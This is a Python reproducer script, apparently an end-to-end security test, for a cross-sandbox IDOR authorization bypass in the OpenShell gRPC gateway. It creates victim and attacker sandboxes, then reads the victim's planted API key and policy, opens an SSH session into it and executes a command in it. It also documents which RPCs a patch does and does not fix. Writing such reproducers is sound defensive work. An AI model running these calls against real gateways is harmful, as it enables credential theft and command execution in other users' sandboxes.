#!/usr/bin/env python3
# SPDX-FileCopyrightText: Copyright (c) 2025-2026 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
"""
Reproducer: Cross-Sandbox Authorization Bypass via IDOR
=======================================================
Product : NVIDIA OpenShell (openshell-server gRPC gateway)
Version : 0.0.8-dev.5 (commit 925160e84, main branch)
CWE : CWE-639 - Insecure Direct Object Reference
CVSS : 7.7 (High) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Vulnerability
-------------
Sandbox-scoped gRPC RPCs accept an arbitrary sandbox_id with no
ownership or authorization check. All sandbox pods and the CLI share
a single mTLS client certificate (CN=openshell-client), so the server
cannot distinguish callers at the TLS layer. This allows any sandbox
(or any holder of the shared cert) to:
- Read another sandbox's provider credentials (API keys) via
GetSandboxProviderEnvironment
- Read another sandbox's policy via GetSandboxPolicy
- Create SSH sessions into another sandbox via CreateSshSession
- Execute arbitrary commands inside another sandbox via ExecSandbox
The impact is amplified by the optional unauthenticated edge mode
where no mTLS is required at all.
What this script tests
----------------------
The script creates two sandboxes: a VICTIM (with a secret API key)
and an ATTACKER (separate, no provider). It then calls sandbox-scoped
RPCs using the victim's sandbox_id from the attacker's perspective
(the same mTLS connection, no per-sandbox authorization token).
Tested RPCs:
1. GetSandboxProviderEnvironment - no token (attacker reads victim creds)
2. GetSandboxProviderEnvironment - fabricated token against victim
3. GetSandboxPolicy - no token (attacker reads victim policy)
4. CreateSshSession - no token (attacker gets SSH into victim)
5. ExecSandbox - no token (attacker runs commands in victim)
Tests 1-3 target RPCs that were hardened by the fix (should reject on
patched servers). Tests 4-5 target write-side RPCs (CreateSshSession,
ExecSandbox) which remain unprotected at the time of writing.
Tests 4-5 require the sandbox pod to be in Ready phase. Use --wait-ready
to poll until the sandbox controller has provisioned the pod (default
timeout: 120s). Without --wait-ready, write-side tests will be
INCONCLUSIVE if pods are not yet running.
Limitations
-----------
Legacy sandbox caveat: The patched server's validate_sandbox_token()
allows unrestricted access to sandboxes whose sandbox_token_hash is
empty (created before token enforcement). This script only creates
fresh sandboxes, which always receive a token hash, so it cannot
exercise that legacy compatibility path. A "FIXED" result here does
not prove legacy sandboxes are protected.
Test 2 uses a fabricated UUID-format token, not the attacker sandbox's
real OPENSHELL_SANDBOX_TOKEN. The real token is only available inside
the attacker's pod (injected as an environment variable during pod
creation) and is not returned by the CreateSandbox API. A full cross-
sandbox token replay test would require exec'ing into the attacker pod
to retrieve it. On unpatched servers this distinction is irrelevant
since no token validation exists. On patched servers, the fabricated
token still proves the server rejects non-matching tokens, but would
not catch a hypothetical regression that accepts any valid-for-some-
sandbox token.
Tests 4-5 (CreateSshSession, ExecSandbox) will be INCONCLUSIVE when
the sandbox pod is not actually running, because the server rejects
with FAILED_PRECONDITION before reaching any authorization logic.
Use --wait-ready to wait for pod provisioning. The absence of
validate_sandbox_token() in both handlers is confirmed by source
inspection (see grpc.rs create_ssh_session and exec_sandbox).
Error classification: Tests 1-3 only count UNAUTHENTICATED or
PERMISSION_DENIED as proof that the authorization fix is active.
Any other gRPC error (NOT_FOUND, INTERNAL, UNAVAILABLE, etc.) is
recorded as INCONCLUSIVE to avoid false confidence from transport
or unrelated server failures.
Prerequisites
-------------
1. A running OpenShell gateway (openshell gateway start)
2. Python 3.10+ with grpcio and protobuf
3. Generated proto stubs in python/openshell/_proto/
4. mTLS certs at ~/.config/openshell/gateways/<gateway>/mtls/
Usage
-----
Read-side tests only (fast, no pod wait):
PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py
Full test including write-side (waits for pod provisioning):
PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\
--wait-ready
With custom endpoint, gateway name, or timeout:
PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\
--wait-ready --ready-timeout 180 --endpoint 127.0.0.1:8080 --gateway openshell
PYTHONPATH=python uv run python e2e/python/reproducer_sandbox_authz_bypass.py \\
--plaintext --endpoint 127.0.0.1:9090
Expected results
----------------
VULNERABLE (unpatched): All tests return data - API keys leaked,
SSH session created, commands executed,
policy disclosed.
FIXED (patched): Tests 1-3 are rejected with UNAUTHENTICATED
or PERMISSION_DENIED. Tests 4-5 may still
succeed (CreateSshSession and ExecSandbox
are not yet gated).
Note: "FIXED" only covers fresh sandboxes.
Legacy sandboxes with empty token hashes
are still allowed through by the patch.
"""
from __future__ import annotations
import argparse
import pathlib
import sys
import time
import grpc
from openshell._proto import (
datamodel_pb2,
openshell_pb2,
openshell_pb2_grpc,
sandbox_pb2,
)
def parse_args(argv: list[str] | None = None) -> argparse.Namespace:
    """Parse the reproducer's command-line options.

    Args:
        argv: Argument list to parse. ``None`` (the default) lets argparse
            read ``sys.argv[1:]``, which is what the script entry point
            relies on; passing an explicit list allows programmatic use.

    Returns:
        Namespace with ``endpoint``, ``gateway``, ``plaintext``,
        ``wait_ready`` and ``ready_timeout`` attributes.
    """
    parser = argparse.ArgumentParser(
        description="Reproduce cross-sandbox authorization bypass in OpenShell gateway",
    )
    parser.add_argument(
        "--endpoint",
        default="127.0.0.1:8080",
        help="Gateway gRPC endpoint (default: 127.0.0.1:8080)",
    )
    parser.add_argument(
        "--gateway",
        default="openshell",
        help="Gateway name for mTLS cert lookup (default: openshell)",
    )
    parser.add_argument(
        "--plaintext",
        action="store_true",
        help="Use insecure plaintext channel (skip mTLS)",
    )
    parser.add_argument(
        "--wait-ready",
        action="store_true",
        help="Wait for victim sandbox pod to reach Ready before running "
        "write-side tests (CreateSshSession, ExecSandbox). Without this "
        "flag, write-side tests may be INCONCLUSIVE.",
    )
    parser.add_argument(
        "--ready-timeout",
        type=int,
        default=120,
        help="Seconds to wait for sandbox Ready when --wait-ready is set "
        "(default: 120)",
    )
    return parser.parse_args(argv)
def make_channel(args: argparse.Namespace) -> grpc.Channel:
    """Open a gRPC channel to ``args.endpoint``.

    With ``args.plaintext`` set, an insecure channel is returned. Otherwise
    ``ca.crt``, ``tls.crt`` and ``tls.key`` are read from
    ``~/.config/openshell/gateways/<args.gateway>/mtls/`` and used to build
    a secure channel that presents the client certificate.
    """
    if not args.plaintext:
        cert_dir = pathlib.Path.home().joinpath(
            ".config", "openshell", "gateways", args.gateway, "mtls"
        )
        # Read in the same order as the files are listed: CA, cert, key.
        root_ca, client_cert, client_key = (
            (cert_dir / filename).read_bytes()
            for filename in ("ca.crt", "tls.crt", "tls.key")
        )
        tls_credentials = grpc.ssl_channel_credentials(
            root_certificates=root_ca,
            private_key=client_key,
            certificate_chain=client_cert,
        )
        return grpc.secure_channel(args.endpoint, tls_credentials)
    return grpc.insecure_channel(args.endpoint)
def delete_quietly(stub, name: str, kind: str) -> None:
    """Best-effort delete of a sandbox or provider by name.

    RPC failures never propagate, so this is safe to call both before setup
    (the resource may not exist yet) and from a ``finally`` block. A
    NOT_FOUND status is ignored silently; any other RPC failure is reported
    on stderr so a leftover resource does not go unnoticed.

    Args:
        stub: OpenShell gRPC stub used to issue the delete.
        name: Name of the resource to delete.
        kind: Either ``"sandbox"`` or ``"provider"``.

    Raises:
        ValueError: If ``kind`` is not one of the supported values.
    """
    # Validate before touching the network: an unknown kind is a programming
    # error that used to be a silent no-op.
    if kind not in ("sandbox", "provider"):
        raise ValueError(f"unsupported resource kind: {kind!r}")
    try:
        if kind == "sandbox":
            stub.DeleteSandbox(openshell_pb2.DeleteSandboxRequest(name=name))
        else:
            stub.DeleteProvider(openshell_pb2.DeleteProviderRequest(name=name))
    except grpc.RpcError as e:
        # NOTE(review): assumes the server reports a missing resource as
        # NOT_FOUND - confirm against the gateway implementation.
        if e.code() != grpc.StatusCode.NOT_FOUND:
            print(
                f"[!] Could not delete {kind} '{name}': "
                f"{e.code().name}: {e.details()}",
                file=sys.stderr,
            )
def _default_policy() -> sandbox_pb2.SandboxPolicy:
    """Build the version-1 sandbox policy used when creating sandboxes.

    The policy includes the workdir, lists read-only and read-write paths,
    and runs the process as user/group ``sandbox``.
    """
    fs_rules = sandbox_pb2.FilesystemPolicy(
        include_workdir=True,
        read_only=["/usr", "/lib", "/etc"],
        read_write=["/sandbox", "/tmp"],
    )
    run_identity = sandbox_pb2.ProcessPolicy(
        run_as_user="sandbox",
        run_as_group="sandbox",
    )
    return sandbox_pb2.SandboxPolicy(
        version=1,
        filesystem=fs_rules,
        process=run_identity,
    )
def wait_for_sandbox_ready(
    stub, sandbox_id: str, timeout: int = 120, poll_interval: int = 3,
) -> bool:
    """Poll CreateSshSession until sandbox is Ready or timeout expires.

    CreateSshSession is used as the probe because it returns
    FAILED_PRECONDITION when the sandbox phase is not Ready, and succeeds
    (or returns an authz error) when it is.

    Args:
        stub: OpenShell gRPC stub.
        sandbox_id: ID of the sandbox to probe.
        timeout: Overall budget in seconds. Each probe RPC and each sleep is
            capped to the time remaining so the call cannot overrun it.
        poll_interval: Seconds to wait between probes.

    Returns:
        True if the probe succeeded or was rejected with an authorization
        status, False if the timeout expired first.
    """
    deadline = time.monotonic() + timeout
    attempt = 0
    while True:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            return False
        attempt += 1
        try:
            resp = stub.CreateSshSession(
                openshell_pb2.CreateSshSessionRequest(sandbox_id=sandbox_id),
                timeout=remaining,
            )
        except grpc.RpcError as e:
            code = e.code()
            if code in AUTHZ_CODES:
                # An authorization rejection is treated as "ready": the call
                # was not refused for the sandbox phase.
                return True
            remaining = max(0.0, deadline - time.monotonic())
            if code == grpc.StatusCode.FAILED_PRECONDITION:
                print(f" [{attempt}] Sandbox not ready, {int(remaining)}s remaining...")
            else:
                print(f" [{attempt}] Unexpected: {code.name}: {e.details()}")
            time.sleep(min(poll_interval, remaining))
            continue

        # The probe session exists, so the sandbox is ready. Revoke it in a
        # separate try: a revoke failure must not be mistaken for "not ready"
        # and send the loop around to create yet another session.
        try:
            stub.RevokeSshSession(
                openshell_pb2.RevokeSshSessionRequest(token=resp.token)
            )
        except grpc.RpcError as e:
            print(
                f" [{attempt}] Could not revoke probe SSH session: "
                f"{e.code().name}: {e.details()}"
            )
        return True
# gRPC status codes that count as an authorization rejection.
AUTHZ_CODES = frozenset(
    (grpc.StatusCode.UNAUTHENTICATED, grpc.StatusCode.PERMISSION_DENIED)
)
class Result:
    """Running tally of test outcomes plus the ordered list of entries."""

    def __init__(self):
        # Each entry is (test name, status, detail), in recording order.
        self.entries: list[tuple[str, str, str]] = []
        self.vulnerable = 0
        self.fixed = 0
        self.inconclusive = 0

    def record(self, test: str, status: str, detail: str) -> None:
        """Append an entry and bump the counter matching ``status``.

        Any status other than "VULNERABLE" or "FIXED" is counted as
        inconclusive.
        """
        self.entries.append((test, status, detail))
        counter = {"VULNERABLE": "vulnerable", "FIXED": "fixed"}.get(
            status, "inconclusive"
        )
        setattr(self, counter, getattr(self, counter) + 1)

    def record_rpc_error(self, test: str, e: grpc.RpcError) -> None:
        """Record a failed RPC as FIXED or INCONCLUSIVE.

        Only a status in AUTHZ_CODES (UNAUTHENTICATED, PERMISSION_DENIED)
        is taken as evidence that the authorization check fired. Every
        other status (NOT_FOUND, INTERNAL, UNAVAILABLE, ...) is ambiguous
        and is recorded as INCONCLUSIVE to avoid false confidence.
        """
        summary = f"{e.code().name}: {e.details()}"
        if e.code() not in AUTHZ_CODES:
            print("\n [??] INCONCLUSIVE - non-authz error")
            print(f" {summary}")
            self.record(test, "INCONCLUSIVE", summary)
            return
        print(f"\n [OK] REJECTED by authorization - {summary}")
        self.record(test, "FIXED", summary)
# Fixture names and the planted secret, shared by setup, tests and cleanup.
SECRET_KEY = "sk-ant-SUPER-SECRET-KEY-12345"
VICTIM_PROVIDER = "repro-victim-provider"
VICTIM_SANDBOX = "repro-victim-sandbox"
ATTACKER_SANDBOX = "repro-attacker-sandbox"
_RULE = "=" * 64


def _banner(title: str, victim_id: str, token_desc: str, *extra: str) -> None:
    """Print the header block that introduces one test."""
    print()
    print(_RULE)
    print(title)
    print(" caller context = attacker (shared mTLS cert)")
    print(f" target = victim sandbox {victim_id}")
    print(f" x-sandbox-token = {token_desc}")
    for line in extra:
        print(line)
    print(_RULE)


def _create_fixtures(stub) -> tuple[str, str]:
    """Create the victim provider and both sandboxes; return (victim_id, attacker_id)."""
    # Victim provider + sandbox (has secrets).
    delete_quietly(stub, VICTIM_PROVIDER, "provider")
    stub.CreateProvider(
        openshell_pb2.CreateProviderRequest(
            provider=datamodel_pb2.Provider(
                name=VICTIM_PROVIDER,
                type="claude",
                credentials={"ANTHROPIC_API_KEY": SECRET_KEY},
            )
        )
    )
    print(f"[+] Created victim provider '{VICTIM_PROVIDER}'")
    print(f" Secret: {SECRET_KEY}")

    delete_quietly(stub, VICTIM_SANDBOX, "sandbox")
    victim_resp = stub.CreateSandbox(
        openshell_pb2.CreateSandboxRequest(
            name=VICTIM_SANDBOX,
            spec=datamodel_pb2.SandboxSpec(
                policy=_default_policy(),
                providers=[VICTIM_PROVIDER],
            ),
        )
    )
    victim_id = victim_resp.sandbox.id
    print(f"[+] Created victim sandbox '{VICTIM_SANDBOX}' (id: {victim_id})")

    # Attacker sandbox (no provider, separate identity).
    delete_quietly(stub, ATTACKER_SANDBOX, "sandbox")
    attacker_resp = stub.CreateSandbox(
        openshell_pb2.CreateSandboxRequest(
            name=ATTACKER_SANDBOX,
            spec=datamodel_pb2.SandboxSpec(policy=_default_policy()),
        )
    )
    attacker_id = attacker_resp.sandbox.id
    print(f"[+] Created attacker sandbox '{ATTACKER_SANDBOX}' (id: {attacker_id})")
    return victim_id, attacker_id


def _test_provider_environment(
    stub, result: Result, victim_id: str, label: str, metadata=None,
) -> None:
    """Tests 1-2: try to read the victim's provider credentials and record the outcome."""
    test = f"GetSandboxProviderEnvironment ({label})"
    try:
        env_resp = stub.GetSandboxProviderEnvironment(
            openshell_pb2.GetSandboxProviderEnvironmentRequest(
                sandbox_id=victim_id,
            ),
            metadata=metadata,
        )
    except grpc.RpcError as e:
        result.record_rpc_error(test, e)
        return
    leaked = dict(env_resp.environment).get("ANTHROPIC_API_KEY", "")
    detail = f"leaked ANTHROPIC_API_KEY={leaked}"
    print(f"\n [!!] VULNERABLE - {detail}")
    result.record(test, "VULNERABLE", detail)


def _test_policy(stub, result: Result, victim_id: str) -> None:
    """Test 3: try to read the victim's sandbox policy and record the outcome."""
    test = "GetSandboxPolicy (no token)"
    try:
        # GetSandboxPolicyRequest lives in sandbox_pb2 (not openshell_pb2).
        policy_resp = stub.GetSandboxPolicy(
            sandbox_pb2.GetSandboxPolicyRequest(sandbox_id=victim_id)
        )
    except grpc.RpcError as e:
        result.record_rpc_error(test, e)
        return
    detail = f"policy version {policy_resp.version} disclosed"
    print(f"\n [!!] VULNERABLE - {detail}")
    result.record(test, "VULNERABLE", detail)


def _wait_for_victim_ready(stub, victim_id: str, args: argparse.Namespace) -> None:
    """Optionally block until the victim sandbox is Ready, reporting the outcome."""
    if not args.wait_ready:
        print()
        print("[*] Skipping sandbox Ready wait (use --wait-ready to enable)")
        return
    print()
    print(_RULE)
    print(
        f"WAITING for victim sandbox to reach Ready "
        f"(timeout {args.ready_timeout}s)"
    )
    print(_RULE)
    if wait_for_sandbox_ready(stub, victim_id, timeout=args.ready_timeout):
        print(" Victim sandbox is Ready.")
    else:
        print(" Timed out. Write-side tests will be INCONCLUSIVE.")


def _record_write_side_error(
    result: Result, test: str, e: grpc.RpcError, wait_ready: bool,
) -> None:
    """Classify a failed write-side RPC (tests 4-5) as FIXED or INCONCLUSIVE."""
    detail = f"{e.code().name}: {e.details()}"
    if e.code() in AUTHZ_CODES:
        print(f"\n [OK] REJECTED by authorization - {detail}")
        result.record(test, "FIXED", detail)
        return
    if e.code() == grpc.StatusCode.FAILED_PRECONDITION:
        print("\n [??] INCONCLUSIVE - sandbox pod not running")
        print(f" {detail}")
        if not wait_ready:
            print(" Re-run with --wait-ready to wait for pod provisioning.")
    else:
        print("\n [??] INCONCLUSIVE - non-authz error")
        print(f" {detail}")
    result.record(test, "INCONCLUSIVE", detail)


def _test_ssh_session(stub, result: Result, victim_id: str, wait_ready: bool) -> None:
    """Test 4: try to open an SSH session into the victim sandbox and record the outcome."""
    test = "CreateSshSession (no token)"
    try:
        ssh_resp = stub.CreateSshSession(
            openshell_pb2.CreateSshSessionRequest(sandbox_id=victim_id)
        )
    except grpc.RpcError as e:
        _record_write_side_error(result, test, e, wait_ready)
        return
    detail = (
        f"SSH session token issued: {ssh_resp.token[:16]}... "
        f"(host={ssh_resp.gateway_host}:{ssh_resp.gateway_port})"
    )
    print(f"\n [!!] VULNERABLE - {detail}")
    result.record(test, "VULNERABLE", detail)
    # Revoke outside the try above: a revoke failure must not add a second,
    # contradictory entry for this test.
    try:
        stub.RevokeSshSession(
            openshell_pb2.RevokeSshSessionRequest(token=ssh_resp.token)
        )
    except grpc.RpcError as e:
        print(
            f"[!] Could not revoke SSH session: {e.code().name}: {e.details()}",
            file=sys.stderr,
        )


def _test_exec(
    stub, result: Result, victim_id: str, exec_cmd: list[str], wait_ready: bool,
) -> None:
    """Test 5: try to run a command inside the victim sandbox and record the outcome."""
    test = "ExecSandbox (no token)"
    output_parts = []
    exit_code = None
    try:
        events = stub.ExecSandbox(
            openshell_pb2.ExecSandboxRequest(
                sandbox_id=victim_id,
                command=exec_cmd,
            )
        )
        # Iterate inside the try: the source wraps the event loop in the same
        # RpcError handler as the call itself.
        for event in events:
            which = event.WhichOneof("payload")
            if which == "stdout":
                output_parts.append(
                    event.stdout.data.decode("utf-8", errors="replace")
                )
            elif which == "stderr":
                output_parts.append(
                    event.stderr.data.decode("utf-8", errors="replace")
                )
            elif which == "exit":
                exit_code = event.exit.exit_code
    except grpc.RpcError as e:
        _record_write_side_error(result, test, e, wait_ready)
        return
    output = "".join(output_parts).strip()
    marker = (
        "CONFIRMS victim sandbox" if output == VICTIM_SANDBOX
        else "unexpected hostname"
    )
    detail = f"hostname='{output}' ({marker}, exit {exit_code})"
    print(f"\n [!!] VULNERABLE - {detail}")
    result.record(test, "VULNERABLE", detail)


def _print_summary(result: Result) -> None:
    """Print the per-test results table and the overall conclusion."""
    status_tags = {
        "VULNERABLE": "[!!]",
        "FIXED": "[OK]",
        "INCONCLUSIVE": "[??]",
    }
    print()
    print(_RULE)
    print("RESULTS")
    print(_RULE)
    print(f" Tests run: {len(result.entries)}")
    print(f" Vulnerable: {result.vulnerable}")
    print(f" Fixed: {result.fixed}")
    print(f" Inconclusive: {result.inconclusive}")
    print()
    for test, status, detail in result.entries:
        tag = status_tags.get(status, "[--]")
        print(f" {tag} {test}")
        print(f" {detail}")
    print()
    if result.vulnerable > 0:
        print(" CONCLUSION: Authorization bypass CONFIRMED. (exit 2)")
        print(" Cross-sandbox credential exfiltration is possible.")
    elif result.inconclusive > 0:
        if result.fixed > 0:
            print(" CONCLUSION: Read-side RPCs appear fixed, but some tests")
            print(" returned non-authz errors or could not be validated.")
        else:
            # Nothing was rejected by authz, so do not claim any RPC is fixed.
            print(" CONCLUSION: No test produced a definitive result; every")
            print(" RPC returned a non-authz error or could not be validated.")
        print(" Review INCONCLUSIVE entries above. (exit 1)")
    else:
        print(" CONCLUSION: All tested RPCs rejected unauthorized access")
        print(" with explicit authz errors. (exit 0)")


def _run_reproducer(stub, args: argparse.Namespace) -> int:
    """Create fixtures, run the five tests, clean up, and return the exit code."""
    result = Result()
    try:
        try:
            victim_id, attacker_id = _create_fixtures(stub)
        except grpc.RpcError as e:
            print(
                f"[!] Setup failed: {e.code().name}: {e.details()}",
                file=sys.stderr,
            )
            return 1

        # TEST 1: attacker uses the shared mTLS cert to read the victim's
        # provider credentials without any per-sandbox token.
        _banner(
            "TEST 1: GetSandboxProviderEnvironment - no token",
            victim_id,
            "(none)",
        )
        _test_provider_environment(stub, result, victim_id, "no token")

        # TEST 2: submits a fabricated token. This is NOT a real cross-sandbox
        # token replay; see the Limitations section of the module docstring.
        _banner(
            "TEST 2: GetSandboxProviderEnvironment - fabricated token",
            victim_id,
            "(fabricated UUID, not valid for any sandbox)",
        )
        # Strip hyphens and pad so the token keeps the 8-4-4-4-12 shape even
        # when the sandbox id itself contains hyphens or is short.
        token_tail = attacker_id.replace("-", "")[:12].ljust(12, "0")
        fabricated_token = f"aaaaaaaa-bbbb-cccc-dddd-{token_tail}"
        _test_provider_environment(
            stub,
            result,
            victim_id,
            "fabricated token",
            metadata=[("x-sandbox-token", fabricated_token)],
        )

        # TEST 3: attacker reads the victim's sandbox policy configuration.
        _banner("TEST 3: GetSandboxPolicy - no token", victim_id, "(none)")
        _test_policy(stub, result, victim_id)

        # Write-side tests return FAILED_PRECONDITION when the pod is not
        # running, so optionally wait for the sandbox to become Ready first.
        _wait_for_victim_ready(stub, victim_id, args)

        # TEST 4: attacker creates an SSH session into the victim's sandbox.
        _banner("TEST 4: CreateSshSession - no token", victim_id, "(none)")
        _test_ssh_session(stub, result, victim_id, args.wait_ready)

        # TEST 5: attacker runs a command inside the victim's sandbox.
        exec_cmd = ["hostname"]
        _banner(
            "TEST 5: ExecSandbox - no token",
            victim_id,
            "(none)",
            f" command = {exec_cmd}",
            f" expected output = '{VICTIM_SANDBOX}' (victim pod name)",
        )
        _test_exec(stub, result, victim_id, exec_cmd, args.wait_ready)

        _print_summary(result)
    finally:
        delete_quietly(stub, ATTACKER_SANDBOX, "sandbox")
        delete_quietly(stub, VICTIM_SANDBOX, "sandbox")
        delete_quietly(stub, VICTIM_PROVIDER, "provider")
        print("\n[+] Cleanup complete")

    if result.vulnerable > 0:
        return 2
    if result.inconclusive > 0:
        return 1
    return 0


def main() -> int:
    """Run the reproducer end to end.

    Returns:
        2 if any test was recorded as VULNERABLE, 1 if any test was
        INCONCLUSIVE or the gateway/credentials/setup could not be used,
        0 if every test was rejected with an authorization error.
    """
    args = parse_args()
    try:
        channel = make_channel(args)
    except OSError as e:
        # Missing or unreadable cert files: report instead of a traceback.
        print(
            f"[!] Cannot load mTLS credentials for gateway '{args.gateway}': {e}",
            file=sys.stderr,
        )
        return 1

    # The channel is closed on every exit path, including a failed Health check.
    try:
        stub = openshell_pb2_grpc.OpenShellStub(channel)
        try:
            stub.Health(openshell_pb2.HealthRequest(), timeout=10)
        except grpc.RpcError as e:
            print(f"[!] Cannot reach gateway at {args.endpoint}: {e}", file=sys.stderr)
            return 1
        print(f"[+] Connected to gateway at {args.endpoint}")
        return _run_reproducer(stub, args)
    finally:
        channel.close()
# Script entry point: exit with main()'s return value as the process status.
if __name__ == "__main__":
    sys.exit(main())
# End of reproducer.